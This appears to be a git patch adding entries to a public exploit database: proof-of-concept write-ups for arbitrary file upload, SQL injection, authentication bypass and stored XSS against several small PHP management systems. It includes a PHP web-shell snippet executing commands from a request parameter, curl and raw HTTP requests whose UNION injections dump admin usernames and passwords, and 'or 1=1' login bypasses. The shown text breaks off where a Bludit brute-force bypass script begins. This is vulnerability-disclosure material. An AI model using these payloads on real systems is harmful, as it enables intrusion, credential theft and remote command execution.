From 99b2cc4c13426f2bf8a5a054c081332b270b26ef Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 24 Oct 2020 05:02:08 +0000 Subject: [PATCH] DB: 2020-10-24 17 changes to exploits/shellcodes Online Library Management System 1.0 - Arbitrary File Upload Ajenti 2.1.36 - Remote Code Execution (Authenticated) Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection Car Rental Management System 1.0 - Arbitrary File Upload User Registration & Login and User Management System 2.1 - SQL Injection Point of Sales 1.0 - 'id' SQL Injection Lot Reservation Management System 1.0 - Authentication Bypass Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored) Gym Management System 1.0 - 'id' SQL Injection Point of Sales 1.0 - 'username' SQL Injection School Faculty Scheduling System 1.0 - 'id' SQL Injection School Faculty Scheduling System 1.0 - 'username' SQL Injection Gym Management System 1.0 - Authentication Bypass Gym Management System 1.0 - Stored Cross Site Scripting Bludit 3.9.2 - Auth Bruteforce Bypass TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated) --- exploits/php/webapps/48636.txt | 1 + exploits/php/webapps/48928.txt | 21 ++++ exploits/php/webapps/48930.txt | 41 ++++++++ exploits/php/webapps/48931.txt | 21 ++++ exploits/php/webapps/48932.txt | 23 +++++ exploits/php/webapps/48933.txt | 35 +++++++ exploits/php/webapps/48934.txt | 35 +++++++ exploits/php/webapps/48935.txt | 87 +++++++++++++++++ exploits/php/webapps/48936.txt | 25 +++++ exploits/php/webapps/48937.txt | 29 ++++++ exploits/php/webapps/48938.txt | 24 +++++ exploits/php/webapps/48939.txt | 24 +++++ exploits/php/webapps/48940.txt | 31 ++++++ exploits/php/webapps/48941.txt | 46 +++++++++ exploits/php/webapps/48942.py | 102 ++++++++++++++++++++ exploits/php/webapps/48943.py | 158 +++++++++++++++++++++++++++++++ exploits/python/webapps/48929.py | 53 +++++++++++ files_exploits.csv | 16 ++++ 18 files changed, 772 insertions(+) create mode 100644 exploits/php/webapps/48928.txt create mode 100644 exploits/php/webapps/48930.txt create mode 100644 exploits/php/webapps/48931.txt create mode 100644 exploits/php/webapps/48932.txt create mode 100644 exploits/php/webapps/48933.txt create mode 100644 exploits/php/webapps/48934.txt create mode 100644 exploits/php/webapps/48935.txt create mode 100644 exploits/php/webapps/48936.txt create mode 100644 exploits/php/webapps/48937.txt create mode 100644 exploits/php/webapps/48938.txt create mode 100644 exploits/php/webapps/48939.txt create mode 100644 exploits/php/webapps/48940.txt create mode 100644 exploits/php/webapps/48941.txt create mode 100755 exploits/php/webapps/48942.py create mode 100755 exploits/php/webapps/48943.py create mode 100755 exploits/python/webapps/48929.py diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt index 35326f319..599c53baf 100644 --- a/exploits/php/webapps/48636.txt +++ b/exploits/php/webapps/48636.txt @@ -4,6 +4,7 @@ # Vendor Homepage: http://ritecms.com/ # Version: 2.2.1 # Tested on: Linux +# CVE: CVE-2020-23934 1- Go to following url. >> http://(HOST)/cms/ 2- Default username and password is admin:admin. We must know login credentials. diff --git a/exploits/php/webapps/48928.txt b/exploits/php/webapps/48928.txt new file mode 100644 index 000000000..cbc0e8d28 --- /dev/null +++ b/exploits/php/webapps/48928.txt @@ -0,0 +1,21 @@ +# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload +# Date: 22-10-2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29 +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + + +#Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add + +#Exploit + Fill details + Create php shell code with below script + "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> + Click on Browse + Select php file + Click Save + Access below URL: + http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir + add system commands after cmd to execute it. \ No newline at end of file diff --git a/exploits/php/webapps/48930.txt b/exploits/php/webapps/48930.txt new file mode 100644 index 000000000..2cf4e4bc8 --- /dev/null +++ b/exploits/php/webapps/48930.txt @@ -0,0 +1,41 @@ +# Exploit Title: Stock Management System 1.0 - SQL Injection +# Dork: N/A +# Date: 2020-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +fetchSelectedBrand.php +# +$brandId = $_POST['brandId']; +$sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId"; +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \ + --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \ + $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php' +# +# POC: +# 2) +# +fetchSelectedCategories.php +# +$categoriesId = $_POST['categoriesId']; +$sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId"; +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \ + --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \ + $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php' +# +# ++ + +# \ No newline at end of file diff --git a/exploits/php/webapps/48931.txt b/exploits/php/webapps/48931.txt new file mode 100644 index 000000000..cb8e3f691 --- /dev/null +++ b/exploits/php/webapps/48931.txt @@ -0,0 +1,21 @@ +# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload +# Date: 22-10-2020 +# Exploit Author: Jyotsna Adhana and Saurav Shukla +# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + + +#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car + +#Exploit + Fill details + Create php shell code with below script + "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> + Click on Browse + Select php file + Click Save + Access below URL: + http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo + add system commands after cmd to execute it. \ No newline at end of file diff --git a/exploits/php/webapps/48932.txt b/exploits/php/webapps/48932.txt new file mode 100644 index 000000000..62f60a454 --- /dev/null +++ b/exploits/php/webapps/48932.txt @@ -0,0 +1,23 @@ +# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection +# Dork: N/A +# Date: 2020-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: 2.1 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname + +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname + +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email + +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact +# +# +# \ No newline at end of file diff --git a/exploits/php/webapps/48933.txt b/exploits/php/webapps/48933.txt new file mode 100644 index 000000000..70d7a6ecf --- /dev/null +++ b/exploits/php/webapps/48933.txt @@ -0,0 +1,35 @@ +#Exploit Title: Point of Sales 1.0 - SQL Injection +#Date: 2020-10-22 +#Exploit Author: Ankita Pal +#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html +#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip +#Version: V1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1 + +Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1' + +Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+ + +Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+ + +Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+ + + +Malicious Request::: + +GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id +Upgrade-Insecure-Requests: 1 + +Gives database name *sourcecodester_posdb* \ No newline at end of file diff --git a/exploits/php/webapps/48934.txt b/exploits/php/webapps/48934.txt new file mode 100644 index 000000000..65e66a57e --- /dev/null +++ b/exploits/php/webapps/48934.txt @@ -0,0 +1,35 @@ +#Exploit Title: lot reservation management system 1.0 - Authentication Bypass +#Date: 2020-10-22 +#Exploit Author: Ankita Pal +#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html +#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip +#Version: V1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php + +Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password. + + +Malicious Request::: + +POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 71 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id + +username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B + +You will be login as admin of the application. \ No newline at end of file diff --git a/exploits/php/webapps/48935.txt b/exploits/php/webapps/48935.txt new file mode 100644 index 000000000..73c0dc338 --- /dev/null +++ b/exploits/php/webapps/48935.txt @@ -0,0 +1,87 @@ +#Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting +#Date: 2020-10-22 +#Exploit Author: Ankita Pal +#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html +#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip +#Version: 1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions + +Step 2: Use payload in Name and Discription. + + +Malicious Request::: +POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097 +Content-Length: 613 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="id" + + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="name" + + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="description" + + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------65714323539404637092301409097-- + +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="gender" + +Female +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="contact" + +9876543211 +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="nid" + +12 +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="address" + +Gujarat +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="dept" + +CS +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="degree" + +BE +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="salary" + + +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream + + +-----------------------------3267707159765331982713791736-- + + +Cookie will be reflected on View Employee. \ No newline at end of file diff --git a/exploits/php/webapps/48936.txt b/exploits/php/webapps/48936.txt new file mode 100644 index 000000000..072d2c1b2 --- /dev/null +++ b/exploits/php/webapps/48936.txt @@ -0,0 +1,25 @@ +# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: id +# Injected Request + +GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/gym/gym/index.php?page=users +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re + + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48937.txt b/exploits/php/webapps/48937.txt new file mode 100644 index 000000000..d3c91c717 --- /dev/null +++ b/exploits/php/webapps/48937.txt @@ -0,0 +1,29 @@ +# Exploit Title: Point of Sales 1.0 - 'username' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29 +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: username +# Injected Request + +POST /pos/pos/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 81 +Origin: http://localhost +Connection: close +Referer: http://localhost/pos/pos/ +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D +Upgrade-Insecure-Requests: 1 + +username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login= + +//Comment +The reponse will be delayed by 5s. \ No newline at end of file diff --git a/exploits/php/webapps/48938.txt b/exploits/php/webapps/48938.txt new file mode 100644 index 000000000..842a98f3e --- /dev/null +++ b/exploits/php/webapps/48938.txt @@ -0,0 +1,24 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: id +# Injected Request + +GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48939.txt b/exploits/php/webapps/48939.txt new file mode 100644 index 000000000..aa3f0cf67 --- /dev/null +++ b/exploits/php/webapps/48939.txt @@ -0,0 +1,24 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: id +# Injected Request + +GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48940.txt b/exploits/php/webapps/48940.txt new file mode 100644 index 000000000..d1c5d5e39 --- /dev/null +++ b/exploits/php/webapps/48940.txt @@ -0,0 +1,31 @@ +# Exploit Title: Gym Management System 1.0 - Authentication Bypass +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/gym/gym/login.php + +Step 2: use payload jyot' or 1=1# in Username and Password field + +Malicious Request + +POST /gym/gym/ajax.php?action=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 55 +Origin: http://localhost +Connection: close +Referer: http://localhost/gym/gym/login.php +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23 + +Step 3: You will be logged in as admin. \ No newline at end of file diff --git a/exploits/php/webapps/48941.txt b/exploits/php/webapps/48941.txt new file mode 100644 index 000000000..f499043bd --- /dev/null +++ b/exploits/php/webapps/48941.txt @@ -0,0 +1,46 @@ +# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages + +Step 2: use payload in Package Name and Description field + +Malicious Request +POST /gym/gym/ajax.php?action=save_package HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710 +Content-Length: 587 +Origin: http://localhost +Connection: close +Referer: http://localhost/gym/gym/index.php?page=packages +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="id" + + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="package" + + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="description" + + +-----------------------------10391575234966392972740129710 +Content-Disposition: form-data; name="amount" + +1 +-----------------------------10391575234966392972740129710-- + +Step 3: Cookie will be reflected each time someone visits the Packages section. \ No newline at end of file diff --git a/exploits/php/webapps/48942.py b/exploits/php/webapps/48942.py new file mode 100755 index 000000000..8ceec4d0a --- /dev/null +++ b/exploits/php/webapps/48942.py @@ -0,0 +1,102 @@ +#!/usr/bin/python3 + +# Exploit +## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass +## Author: ColdFusionX (Mayank Deshmukh) +## Author website: https://coldfusionx.github.io +## Date: 2020-10-19 +## Vendor Homepage: https://www.bludit.com/ +## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz +## 